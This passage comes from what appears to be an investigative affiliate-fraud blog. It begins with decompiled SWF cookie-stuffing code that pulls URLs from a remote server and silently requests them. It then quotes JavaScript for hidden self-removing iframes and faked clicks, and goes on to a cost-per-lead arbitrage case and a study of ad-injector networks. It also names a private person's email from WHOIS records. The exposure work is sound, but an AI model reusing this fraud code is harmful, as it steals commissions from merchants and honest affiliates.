            addFrameScript(0, frame1);
        }
        function frame1(){
            Security.allowdomain("*");
            url = "http://www.52zhishi.com/v.asp";
            reqURL = new URLRequest(url);
            loader = new URLLoader(reqURL);
            loader.addEventListener(Event.COMPLETE, handleComplete);
            loader.dataFormat = URLLoaderDataFormat.VARIABLES;
        }
        public function handleComplete(_arg1:Event):void{
            var loader:* = null;
            var safe:* = nan;
            var url1:* = null;
            var url2:* = null;
            var url3:* = null;
            var url4:* = null;
            var url5:* = null;
            var url6:* = null;
            var url7:* = null;
            var url8:* = null;
            var url9:* = null;
            var url10:* = null;
            var url11:* = null;
            var url12:* = null;
            var url13:* = null;
            var url14:* = null;
            var url15:* = null;
            var url16:* = null;
            var url17:* = null;
            var url18:* = null;
            var url19:* = null;
            var url20:* = null;
            var request1:* = null;
            var request2:* = null;
            var request3:* = null;
            var request4:* = null;
            var request5:* = null;
            var request6:* = null;
            var request7:* = null;
            var request8:* = null;
            var request9:* = null;
            var request10:* = null;
            var request11:* = null;
            var request12:* = null;
            var request13:* = null;
            var request14:* = null;
            var request15:* = null;
            var request16:* = null;
            var request17:* = null;
            var request18:* = null;
            var request19:* = null;
            var request20:* = null;
            var event:* = _arg1;
            loader = URLLoader(event.target);
            safe = new number(loader.data["safe"]);
            url1 = new string(loader.data["url1"]);
            url2 = new string(loader.data["url2"]);
            url3 = new string(loader.data["url3"]);
            url4 = new string(loader.data["url4"]);
            url5 = new string(loader.data["url5"]);
            url6 = new string(loader.data["url6"]);
            url7 = new string(loader.data["url7"]);
            url8 = new string(loader.data["url8"]);
            url9 = new string(loader.data["url9"]);
            url10 = new string(loader.data["url10"]);
            url11 = new string(loader.data["url11"]);
            url12 = new string(loader.data["url12"]);
            url13 = new string(loader.data["url13"]);
            url14 = new string(loader.data["url14"]);
            url15 = new string(loader.data["url15"]);
            url16 = new string(loader.data["url16"]);
            url17 = new string(loader.data["url17"]);
            url18 = new string(loader.data["url18"]);
            url19 = new string(loader.data["url19"]);
            url20 = new string(loader.data["url20"]);
            if (safe == 1){
                try {
                    request1 = new URLRequest(url1);
                    request2 = new URLRequest(url2);
                    request3 = new URLRequest(url3);
                    request4 = new URLRequest(url4);
                    request5 = new URLRequest(url5);
                    request6 = new URLRequest(url6);
                    request7 = new URLRequest(url7);
                    request8 = new URLRequest(url8);
                    request9 = new URLRequest(url9);
                    request10 = new URLRequest(url10);
                    request11 = new URLRequest(url11);
                    request12 = new URLRequest(url12);
                    request13 = new URLRequest(url13);
                    request14 = new URLRequest(url14);
                    request15 = new URLRequest(url15);
                    request16 = new URLRequest(url16);
                    request17 = new URLRequest(url17);
                    request18 = new URLRequest(url18);
                    request19 = new URLRequest(url19);
                    request20 = new URLRequest(url20);
                    sendToURL(request1);
                    sendToURL(request2);
                    sendToURL(request3);
                    sendToURL(request4);
                    sendToURL(request5);
                    sendToURL(request6);
                    sendToURL(request7);
                    sendToURL(request8);
                    sendToURL(request9);
                    sendToURL(request10);
                    sendToURL(request11);
                    sendToURL(request12);
                    sendToURL(request13);
                    sendToURL(request14);
                    sendToURL(request15);
                    sendToURL(request16);
                    sendToURL(request17);
                    sendToURL(request18);
                    sendToURL(request19);
                    sendToURL(request20);
                } catch(e:error) {
                };
            };
        }
    }

}//package flashcs_old_fla

I give babyface a 1/10:

  • 1 point for Cookie-Stuffing
  • 1 point for compromising a server
  • 1 point for covering his tracks with obfuscated javascript
  • 1 point for trying to protect himself through javascript-set cookies
  • 1 point for having an SWF payload do the dirty work
  • -1 point for putting all of his eggs in one basket in the ASP response. Full dump here. Note the Amazon China affiliate click link (affiliate id 51fanlirb-23). He should be rotating through each of these and protecting them from investigators and other blackhat competitors
  • -3 points for absolutely dreadful code in the SWF

We’ve recently been watching an Amazon Associates fraudster taking remarkable efforts to cover his tracks.  Like many rogue Associates we’ve looked at, he’s stuffing cookies invisibly.  He’s using Flash-based stuffing, a technique first written up last year.  But he’s several notches more sophisticated than most:

The fraudster begins by buying a 125×125 IFRAME in the targeted site, here phonearena.com (much like the fraudster who targeted Venturebeat).

phonearena - affiliate fraud 1

But his Flash creates a doubly-invisible IFRAME — setting CSS visibility to “hidden” and also setting width and height to just 1 pixel each:

ExternalInterface.call("function(fffff) 
{ 
  var xxxxx = document.createElement (\'iframe\'); 
  xxxxx.id = \'xxxxx\'; 
  xxxxx.name = \'xxxxx\'; 
  xxxxx.style.visibility = \'hidden\'; 
  xxxxx.style.width = \'1px\';  
  xxxxx.style.height = \'1px\'; 
  var yyyyy = document.body; 
  yyyyy.appendChild (xxxxx); ...

If you’re hoping to see the fraudster’s IFRAME with ordinary visual inspection, you’ll be disappointed: it’s doubly-invisible, as instructed by the preceding code.

Second, the fraudster uses JavaScript to remove the IFRAME that stuffs Amazon cookies, just ten seconds after the IFRAME loads:

xxxxx.onload = function() 
{ 
  setTimeout (function() 
   {yyyyy.removeChild (xxxxx);}, 10000); 
 }; 
 xxxxx.src = fffff; }", arg1);

Any investigator wanting to find the fraudster’s IFRAME by inspecting the page DOM would have just ten seconds to do so — usually not enough.

Third, this fraudster is rotating among many Amazon Associates IDs.  We found one several months ago, then thirteen more this month.  By using multiple accounts, the fraudster spreads his earnings, and no single account stands out as unreasonably large.  Using many company names is relatively standard among folks with something to hide — recall Direct Revenue’s dozens of company names;.  (By using multiple names, companies seek to avoid the notoreity and additional scrutiny that could result from a single large identity.)  In contrast, any legitimate affiliate would want credit, recognition, and extra payment for its high traffic volume.  So spreading traffic across multiple IDs confirms that this fraudster knows it is breaking Amazon’s rules.

Relatedly, this fraudster carefully uses JavaScript to fake clicks such that HTTP Referers and other characteristics look legitimate when traffic reaches Amazon.  This method automatically causes HTTP Referer fields to take values consistent with the Associate IDs described above.  Here’s a sample of the code that fakes a click and causes HTTP Referers to flow accordingly:

var url="http://www.cellphonetech.net/ads/files/xx.php?dtecebenelcedteuea...";
var xxx = document.createElement ("a");
if (typeof(xxx.click) == 'undefined')
{ location.href = url;  }
else
{ xxx.href = url; document.body.appendChild(xxx); xxx.click(); }

Fourth, this fraudster is unusually cautious in how many users he stuffs.  In our testing, his ad stuffs only about one third of users.  Furthermore, he stuffs only on the first visit.  If your IP is not selected on the first visit, you will never be stuffed on any subsequent visit, no matter how many times you revisit.  He also limits his stuffing to certain geographies and with other restrictions we’ll save for another write-up.  Of course this caution comes at a cost — less stuffing relative to his media-buying costs — but the fraudster seems to find this profitable.  Specifically, this reduces his likelihood of detection — letting him continue at greater length.  Combining this caution with the fraudster’s use of Flash, double invisibility, and ten-second automatic removal from the DOM — and he’s unusually hard to catch.

How much money is this fraudster making?  We don’t know for sure, and Amazon has no reason to say.  But the fraudster is buying display ad space on a popular site (Alexa ranking <1500).  That can’t be cheap, and he must anticipate earning money more than enough to cover his costs.  As best we can tell, Amazon Associates is this fraudster’s entire business model, with no other networks being targeted — meaning that Amazon is paying the entire cost of this fraudster’s scheme.

Of course users see nothing — not even an extra popup or popunder.  Users do get a bit of bandwidth wasted by the extra page-load, but even folks on a mobile data plan probably wouldn’t notice.  The big loser is Amazon — paying affiliate fees, as much as 8%, to get traffic it otherwise would have received completely free.  We’re also struck by the losses to other affiliates: If another affiliate truly referred the user to Amazon, but this fraudster interceded to stuff its cookie, then the honest affiliate’s commission is stolen by this fraudster.

Here’s a sampling of the Amazon Associates IDs we’ve seen this fraudster using:

berryreview-20
fashionfunda-20
horrnigh-20
insidepulse0b-20
onlinecamer0a-20
rivcitspo-20
stratagonline-20
tecbitbytnib-20
tenetu-20
thechicfash04-20
zenilshroff-20

Full packet log of our first observation of this fraudster’s activities available here.

We call this fraudster Cellphonetech because his controlling server is cellphonetech dot net.  WHOIS indicates that the registrant is Lin Yong of Fujian China, email address joannatse01@gmail.com.

Cost Per Lead (CPL) is an advertising model where the advertiser pays for sign-ups from interested consumers. Affiliates play the middle men in these transactions for they send the interested consumers in the direction of the advertiser. So for each consumer that signs up with the advertiser, the affiliate in question is paid a commission or small fee. By offloading the task of sourcing consumers onto the affiliates, advertisers are spared the hassle of everything that this work involves. So it’s a great model, but unfortunately still open to abuse.

The following screenshot shows the MaxBounty program for the World of Tanks advertiser. world of tanks affiliate fraudNote the following:

  • Commission rate of “$2.65″/lead. This means that the advertiser will pay affiliates $2.65 for each sign-up that is sent their way
  • The advertiser is only interested in traffic from USA or Canada
  • Incentive traffic is prohibited, indicating that affiliates can not encourage consumers to sign-up with the advertiser by offering rewards the likes of cash or points in some program.

Now take a look at a screenshot from an online forum that pays subscribers to do small online tasks (much like Amazon’s Mechanical Turk):
world-of-tanks-2Do You See What I See?

Most seasoned affiliate managers know where this is going, but don’t worry if you’re not sure where we’re heading yet because we are going to go through this step by step.

The online forum is offering $0.40 to users in USA or Canada who will sign up using the link that has been provided. This is a packet trace of me following the link using my browser, the screenshot below shows the result.

world of tanks affiliate fraud This is what’s going on in the packet trace:

  1. Subscriber in the online forum decides he wants the $0.40 on offer in the online form
  2. He/she starts the task by navigating to http://tinyurl.com/olghhz7
  3. Tinyurl redirects to http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/?mn=1154 which then uses Javascript and an HTML form to redirect the browser to http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/ (this essentially launders the referrer)
  4. http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/ sets up a full screen iframe which contains www.mb57.com which redirects to the following affiliate click URL: www.maxbounty.com/lnk.asp?o=5572&amp;c=63867&amp;a=105565&amp;s1=tanks
  5. This URl redirects to track.popmog.com which redirects to worldoftanks.com

So what you have here is an affiliate taking advantage of a price differentiation in two markets. Of course, one of these markets is of his own creation, but essentially this equates to arbitrage (pay $0.40 and sell $2.65) and a bad deal for Worldoftanks (the poor advertiser that bankrolls this operation).

Ad injectors insert ads into others’ sites, without permission from those sites and without payment to those sites. See example screenshots below showing injections into YouTube, Amazon, CNN, Dell, and eBay.

ad injectors ad injectors
ad injectors ad injectors
ad injectors ad injectors

In this article, we review the basic operation of ad injectors, then examine the ad networks, exchanges, and other intermediaries that broker the placement of advertising through injectors.
We focus on advertisers and ad networks because their payments are the sole funding of most ad injectors. If advertisers and ad brokers universally rejected injector traffic as improper and unwanted, then injectors would have no reason to exist, no means to pay to get installed on users’ computers, and no reason to continue operation.

We also report which advertisers most often advertise through injectors. Whether through complexity, inattention, or indifference, these advertisers’ expenditures are ultimately the sole revenue source for injectors.

The Business of Ad Injection

To modify the appearance of targeted sites, injectors rely on software installed on users’ computers. Injectors largely target Windows users, though in many instances injectors modify  Chrome and Firefox in addition to Internet Explorer. The restricted architecture of mobile devices and tablets currently largely protects those platforms from ad injectors.

We currently primarily see injectors becoming installed through bundles — often, including an injector when a user seeks entirely unrelated software. Typically, the inclusion of the injector is disclosed only midway through the installation process of software that is purportedly “free.” We struggle to reconcile mid-installation disclosure with the “outset of the offer” requirement in the FTC’s Guide Concerning Use of the Word “Free” and Similar Representations: The FTC instructs that if a “free” offer is contingent on other obligations, those obligations must be disclosed at the outset of the offer, not midway through.

A separate potential concern comes from installation disclosures that are less than forthright. For example,  injector installation disclosures often state that ads may be displayed “when you browse the web.” This vague disclosure is at best unclear as to where ads will appear, giving consumers little warning that ads will in fact be inserted to appear within the sites users view. Consumers have little reason to suspect that installing a program can change the appearance of entirely unrelated web sites, and this vague disclosure, lacking in specifics and appearing midway through an installation process,  fails to tell consumers what they are purportedly accepting.

While concern at injectors has grown over the past two years, injectors are actually longstanding. In 2001, adware pioneer Gator began distributing software that would seek standard-sized banner ads and cover them with Gator’s own ads. When the Internet Advertising Bureau criticized this practice, Gator filed suit — though Gator then abandoned banner replacement in favor of the popup ads for which Gator is more widely remembered. Meanwhile, other injectors continued where Gator had led. For example, in 2007 Edelman reported AT&T, Travelocity, and Vonage advertising through the Fullcontext ad injector. (As those screenshots show, Fullcontext placed banners, among other locations, into the top of Google.com– a location where no third-party ads are ordinarily available at any price.) More recently, Brandi reported ads injected into Google, Amazon, eBay, and Wikipedia, notwithstanding Wikipedia’s refusal to sell ads at all and the other sites’ refusal to sell ads in the place, size, and quantity that this injector caused. Spider.io’s August 2013 screenshots add dozen more examples.

Ad injection has proven  lucrative. As of November 2011, court filings reveal that a single injector maker, Sambreel, enjoyed monthly revenue in excess of $8 million.  Sambreel incurred costs in paying partners to install its software on users’ computers. But Sambreel did not need to write articles, produce videos, or otherwise create original content — in sharp contrast to the publishers whose sites were targeted for injected ads from Sambreel.

Ad injectors raise weighty questions. Consumers are rightly concerned about installation methods and possible harms to privacy, computer reliability, and performance. Sites are concerned about users misattributing injectors’ banners: users would understandably blame web sites for excessive or inappropriate advertising. Sites also perceive unfairness when injectors place ads in content they did not create: Having  prepared that content, sometimes at considerable expense, site operators are alarmed to see the fruits of their efforts flowing to others. We credit the importance of these questions but defer them to the future. Instead, we now turn to identifying the  networks and other intermediaries that transfer funds from advertisers to ad injectors.

The Relationships Supporting Ad Injectors

In principle ad injectors could attempt to sell ad placements directly to advertisers. At the right price, some advertisers might be receptive. Injectors’ offerings would no doubt be more attractive because injectors offer placements in sites that otherwise refuse advertising (e.g. Wikipedia) and because injectors offer placements more prominent than sites otherwise offer (e.g. oversized ads above the fold on nytimes.com). Direct sales would let injectors’ staff personally explain the placements they are offering, and advertisers could make informed, considered decisions.

Instead, in our testing, ad injectors  sell through a web of networks, exchanges, and other intermediaries. On the most favorable view, these intermediaries improve efficiency: Specialist brokers know how to work with advertising buyers and have built systems to optimize ad placements by putting each ad in the locations where it performs best. But these intermediaries create additional complexity that tends to undermine accountability. For example, if traffic flows from an injector to intermediary A to B to C to D to an advertiser, the advertiser may never be told that it is actually buying injector traffic rather than (or in addition to) placements in genuine web sites. Meanwhile, even if some intermediary D figures out that C is sending injector traffic, and even if D refuses to accept that traffic, injection inventory may continue to reach D via other methods — perhaps A to B to E to D. So even diligent intermediaries can find themselves receiving and passing along injector traffic they do not want.

Our first example above, showing an AT&T ad injected into the top of YouTube.com, is unusually simple. Forensically, we found that the placement flowed from Sambreel’s Webcake injector to Sambreel’s Ztstatic and Amasvc servers, which passed an impression to AOL Advertising.com. Then AOL returned the AT&T ad visible in the screenshot. We preserved a packet log of the network transmissions associated with this placement. Despite the simplicity, it is unlikely that AT&T knew it was receiving ads through adware or ad injectors. Indeed, Advertising.com touts “better inventory” including “74 of comScore’s top 100 sites” as the primary reason (top-listed reason on AOL’s site) to buy placements from Advertising.com. An advertiser buying from Advertising.com has no reason to suspect that injections will be included.

The money trail – how funds flow from advertisers to the Peachfuzz injector:

The money trail - how funds flow from advertisers to the Peachfuzz injector.

In other instances, the placement chain can be significantly more complicated. For example, see the second example above, showing a Chevrolet ad injected into the top of YouTube. There, the Peachfuzz injector used an Akamai ad server to pass an injected impression to Serving-display.com which returns Z5X tags passing the impression through the App Nexus marketplace. Next App Nexus returns DoubleClick tags with account code N4694.Beep346, yielding tags from Goodway Group, a digital marketing service provider. Finally, Goodway Group returns an ad for Chevrolet. See the diagram at left. This  placement chain is typical of the injections we have examined.

In the subsequent sections, we run a similar analysis at large scale and using automation in order to inventory the responsible intermediaries, including intermediary chains that are significantly longer and more complex.

Methodology

We installed a variety of ad injectors on test computers in our labs. We built an automated system to retrieve, analyze, and preserve injected ads from numerous computers around the world, and we monitored the resulting responses to determine the hosts that receive and pass along the resulting traffic. Our methodology allows us to observe all ad networks, ad exchanges, and other advertising intermediaries between an injection and the resulting advertisement. We transfer that data to a relational database for analysis, tabulation, and charting.

Our analysis includes all exchanges and networks that have the ability to prevent ads from being placed into injectors (even if these companies elect not to exercise this right). We attempt to omit passive tool providers with neither the right nor the ability to prevent ads from being served. For example, if a tool provider serves only to count impressions or clicks, that vendor would have little ability to prevent an injector from serving an ad. These exclusions are manual and inevitably imperfect — particularly for hosts that lack clear indication of their function and/or serve multiple functions.

For ease of interpretation, we label most frequently-observed hosts with company names in lieu of domain names.

Results

In testing of September 5 to 12, 2013, we checked the advertisements loaded by three leading different ad injectors. We checked each injector at least ten thousand times from a mix of fourteen different locations in eight countries, in order to obtain a mix of ads. All testing occurred on virtual computers without prior browsing (hence without cookies inviting particular ad targeting or retargeting).

The tables and charts below present the intermediaries receiving traffic from the ad injectors we examined. In each table, the left column reports the intermediaries most often directly or indirectly receiving traffic from the specified ad injector. The third column summarizes the brokers most often passing the traffic from the injector to that intermediary: Some intermediaries disproportionately receive traffic directly from the injector, while other traffic tends to flow from injector to one or more brokers to the specified intermediary.

AddLyrics  Injector – Graph of Intermediaries and Advertisers

In testing of September 6-12, 2013, we examined ads loaded by the AddLyrics ad injector. We checked injected ads 45,854 times. We monitored the resulting responses to determine the hosts that receive and pass along the resulting traffic. In the graph below we depict the ad networks, ad exchanges, and other advertising intermediaries (shown as ellipses in the graph) between an AddLyrics injection and the resulting advertisement (diamonds in the graph). We also reports the advertisers most frequently observed. Color brightness and node size indicate the relative frequency of impressions to/via a given intermediary or advertiser.

Intermediaries brokering placements from AddLyrics

Intermediary Num. obs. Selected intermediaries sending impressions to that intermediary
adsmarket.com 14001 AppNexus (13998), sekindo.com (3)
AppNexus 11854 serving-display.com (4131), DNSR Media Group (2436), Yahoo Right Media (823)
Google DoubleClick 7159 AppNexus (2328), Invite Media (Google) (283), hiro.tv (267)
serving-display.com 6265 AddLyrics Injector (6247), AppNexus (18)
Yahoo Right Media 5287 Yahoo (2235), AppNexus (859), Turn (243)
RewardsArcade 5177 ads2srv.com (95), AppNexus (22), admaxim.com (5)
Yahoo 4492 Yahoo Right Media (2304), AppNexus (515), hiro.tv (199)
ContextWeb (DatranMedia / PulsePoint) 4273 AppNexus (292), hiro.tv (272), Turn (241)
mediaadshost.com 3288
Adap.TV 3102 hiro.tv (709), Turn (337), Neustar AdAdvisor (279)
Google 2750 Google DoubleClick (1249), hiro.tv (28), AppNexus (26)

Complete list of intermediaries available here

Advertisers receiving impressions from AddLyrics

Advertiser Num. obs. Selected intermediaries sending impressions to that advertiser
Systweak 7230 AppNexus, adsmarket.com, Yahoo Right Media
online-video-accelerator.com 3403 adsmarket.com, AppNexus
online-download-accelerator.com 2882 AppNexus, adsmarket.com
downloadbegin.com 1891 adsmarket.com, AppNexus
mirror9.net 1441 adsmarket.com, AppNexus
2013rewardcenter.com 1347 AppNexus, 2012rewardcenter.com
slutsyouknow.com 1336 cpvtrack202.com, display-x.com
Medical News Reporter 1039 AppNexus, traffiliate.com, affhit.com
bangbuddyfinder.com 1016
internet-win.com 903 AppNexus, cliqtrac.com, vialeads.com
nationalhealthresearch.com 899 SiteScout
mirror8.net 899 AppNexus, adsmarket.com

Complete list of advertisers available here

PeachFuzz Injector – Graph of Intermediaries and Advertisers

In testing of September 6-12, 2013, we examined ads loaded by the PeachFuzz ad injector. We checked injected ads 48,653 times.

Intermediaries brokering placements from PeachFuzz

Intermediary Num. obs. Selected intermediaries sending impressions to that intermediary
AppNexus 49829* serving-display.com (14558), DNSR Media Group (4328), adsplats.com (3668)
serving-display.com 35830 Peachfuzz Injector (35808), Adknowledge (14), AppNexus (8)
Google DoubleClick 26877 AppNexus (4163), MathTag (2239), Invite Media (Google) (1567)
Yahoo Right Media 18323 Yahoo (6322), AppNexus (1932), serving-display.com (1425)
Yahoo 12292 Yahoo Right Media (6369), Adknowledge (1112), serving-display.com (1025)
OpenX 11378 Adknowledge (2587), Rocket Fuel Inc. (2502), AppNexus (2437)
Google 11158 Google DoubleClick (5148), serving-display.com (1040), Underdog Media (434)
Turn 9405 OpenX (2484), AppNexus (1070), Yahoo Right Media (1022)
RewardsArcade 9235 ads2srv.com (5067), serving-display.com (2842), esm1.net (119)
eXelate 7729 Neustar AdAdvisor (999), Google DoubleClick (985), Btrll (893)
Advertising.com 7559 AppNexus (2985), Google DoubleClick (744), Adknowledge (430)

* – We saw more than one App Nexus ad call in many Peachfuzz injection impressions. Example: Peachfuzz to App Nexus to some network X to App Nexus to some network Y to an advertiser. The number of App Nexus ad calls thus exceeds the number of Peachfuzz impressions we checked.

Complete list of intermediaries available here

Advertisers receiving impressions from PeachFuzz

Advertiser Num. obs. Selected intermediaries sending impressions to that advertiser
QuiBids 2116 OmniTarget, AppNexus
Living Research Institute 2086 Platinum Success
Draft Street 2041 serving-display.com
Pimsleur Approach 1164 go2jump.org
Medical News Reporter 995 AppNexus, affhit.com, Yahoo Right Media
Anastasia Date 924 ads2srv.com, AppNexus
Lower My Bills 912 AppNexus, Microsoft, Underdog Media
online-video-accelerator.com 866 adsmarket.com, AppNexus
Brightroll 854 AppNexus, Btrll
chinawomendating.asia 783 Secco Squared, serving-display.com
downloaddino.com 715 AppNexus, adsmarket.com

Complete list of advertisers available here

WebCake Injector – Graph of Intermediaries and Advertisers

In testing of September 5-12, 2013, we examined ads loaded by the WebCake ad injector. We checked injected ads 15,834 times.

Intermediaries brokering placements from WebCake

Intermediary Num. obs. Selected intermediaries sending impressions to that intermediary
AppNexus 13368 Webcake Injector (2606), darchermedia.com (1561), Microsoft (1265)
Google DoubleClick 7363 Webcake Injector (930), AppNexus (655), Btrll (422)
mxpnl.com 6067
mixpanel.com 6045
OpenX 5016 Adknowledge (1363), AppNexus (1259), Rocket Fuel Inc. (1100)
Yahoo Right Media 4806 Yahoo (1656), Webcake Injector (1187), AppNexus (518)
yontoo.com 3705 Webcake Injector (3705)
Yahoo 3306 Yahoo Right Media (1669), Webcake Injector (1187), Turn (68)
eXelate 3078 Btrll (372), Google DoubleClick (363), Neustar AdAdvisor (360)
Turn 2967 OpenX (1072), Btrll (621), eXelate (318)
Adknowledge 2721 OpenX (1329), Webcake Injector (1066), AppNexus (293)
Bluekai 2698 Btrll (427), MathTag (425), Google DoubleClick (389)
Accuen 2446 Turn (1089), OpenX (1012), eXelate (315)
Btrll 1903 AppNexus (411), Datalogix (382), eXelate (381)
Rocket Fuel Inc. 1875 OpenX (1085), Btrll (621), Lijit (79)
Advertising.com 1596 AppNexus (700), Webcake Injector (393), Google DoubleClick (286)

Complete list of intermediaries available here

Advertisers receiving impressions from WebCake

Advertiser Num. obs. Selected intermediaries sending impressions to that advertiser
mendfast.com 6102 amasvc.com, Webcake Injector
Appround 450 clkads.com, AppNexus
Brightroll 406 AppNexus, Btrll, Adknowledge
fullsail.edu 156 Google DoubleClick, Webcake Injector, Adknowledge
Facebook 124 Lotame, AppNexus, newsmax.com
goodgamestudios.com 122 traffiliate.com, AppNexus, Webcake Injector
videotomp3download.com 81 Webcake Injector, Yahoo Right Media
newsmax.com 79 AppNexus
battle.net 76 Ilissos/Eyeblaster
Systweak 74 AppNexus, Yahoo Right Media, adsmarket.com
Sprint 65 Aggregate Knowledge

Complete list of advertisers available here

Discussion

Our data reveals a stark disconnect between advertising industry claims and actual practices. For one, numerous ad networks claim to have severed ties with injectors, a claim often inconsistent with our data. For example, on October 24, 2012 Ad Exchanger reported that Rubicon Project, PubMatic, and OpenX claimed to have ceased working with Sambreel and its subsidiaries. But our data — collected nearly a year later — reveals that these firms actually continue to broker substantial Sambreel inventory (along with impressions from other injectors). Indeed, we found OpenX a top-five intermediary brokering Sambreel Webcake injection placements as of September 2013. Similarly, App Nexus claims not to work with Sambreel and to claim that Sambreel’s injection tactic is unethical (“wrong”) — but in fact our crawler found that more than 80% of Sambreel Webcake impressions flow through App Nexus. Indeed, we found App Nexus the single largest broker of Sambreel Webcake traffic.

We also found injection traffic flowing to and through advertising intermediaries that affirmatively and prominently claim to have high quality standards. For example, Underdog Media tells advertisers that it places ads on “thousands of brand safe web sites” — never mentioning placements via ad injectors. Similarly, in the first sentence of its pitch to ad buyers, PubMatic promises “quality publishers” — describing “10,000+ sites” and “1,000+ quality publishers” but saying nothing of placements via ad injection. Nonetheless, our testing found widespread injection traffic flowing through these intermediaries.

By all indications, ad injectors use multiple names and convoluted relationships to hinder accountability. For example, at one point Sambreel’s “Businesses” page listed seventeen different brand names — some widely known by advertising professionals as performing ad injection; others relatively obscure. Sambreel subsequently removed this page and imposed a Robots.txt file blocking archival by Archive.org although allowing all other crawlers. Advertising intermediaries seeking to avoid all Sambreel injections must find all of Sambreel’s product names (perhaps relying in part on others’ efforts, like a recent “unmasked” listing from ThreatTrack Security), then exclude every Sambreel product. Furthermore, they must also insist that their partners and their partners’ partners all do the same, less injection traffic arrive indirectly. As a result, even diligent networks and advertisers struggle to avoid receiving injection inventory.

Advertising optimization systems further assist injectors. Injected ads are placed in top positions in popular sites, so measurement systems tend to report that these ads perform well — for example, high click-through rate and frequent conversions (i.e. purchases). Meanwhile, injectors need not create or organize articles or other content, reducing their costs and letting them sell injection inventory at modest prices. A standard advertising optimization platform would tend to view injection traffic favorably — good performance at competitive costs. As a result, an optimization platform would ordinarily elect to buy more injection traffic — even if an advertiser in fact views this traffic as unethical or otherwise unwanted. A network would need strong internal controls and manual checks to counter the optimization platform’s recommendation.

Our view of injectors is guided by the need to protect investment incentives so publishers have appropriate motivation to build, update, and improve their sites. Most publishers incur significant costs in gathering and distributing content. Similarly, online merchants make significant investments to design their sites and attract users. If injectors and other adware can grab this traffic for their own purposes, without authorization and without payment, then originating publishers and merchants see lower upside to their investments — less revenue to offset the production of quality content, and less impetus to pay to bring users to their sites.

Meanwhile, injectors clearly worsen the user experience by displaying more ads, slowing page-loads, and sharing information about users’ browsing patterns. For example, we found Peachfuzz inserting two large ads (a 728×90 and a 300×250) into the top of Amazon.com — pushing Amazon’s core home page offers down the page. Last year we found a similar problem at Travelocity, where large top-of-page ads forced users to scroll to conduct a basic flight or hotel search. Amazon and Travelocity would never choose this design, as it invites users to take their business elsewhere. But injectors need not consider sites’ usability or reputation.

With reference to the example screenshots above, injectors also show ads that publishers would never accept. If the Dell site were to show ads for other companies — which it does not and to our knowledge never has — we are confident that Dell would not allow ads from direct competitors. But injectors have no such constraint, and we found the Coupon Companion injector targeting Dell with a Best Buy ad. Meanwhile, Peachfuzz inserte a fake-user-interface “You need to update your media player” ad into Amazon and inserted “Lose the belly fat” and “Who’s been arrested” ads into CNN. By separating publishers from ad quality decisions, injectors undermine the market forces that ordinarily encourage publishers to require high ad quality.

Notably, some companies both profit from injectors and are targeted by injections. For example, Google Youtube is a top target of most injectors, including as shown in multiple screenshots above. We understand that Google has asked some injectors to stop targeting Youtube in this way, and in a statement to AdWeek, Google claims to have “banned [injectors] from using Google’s monetization and marketing tools.” Despite Google’s claim, our crawlers reveal injector impressions often passing through Google, including Google’s in-house display ad marketplaces, DoubleClick serving, and more recent acquisitions such as AdMeld.

Our data reveals that some advertising platforms have succeeded in avoid injection inventory. Yet others have embraced injection traffic despite its serious problems. Remarkably, many advertising professionals seem to have at best a limited sense of which networks, exchanges, and other intermediaries are harboring injection traffic and allowing these practices to continue. Our reporting of top participants is a first step towards transparency in that regard.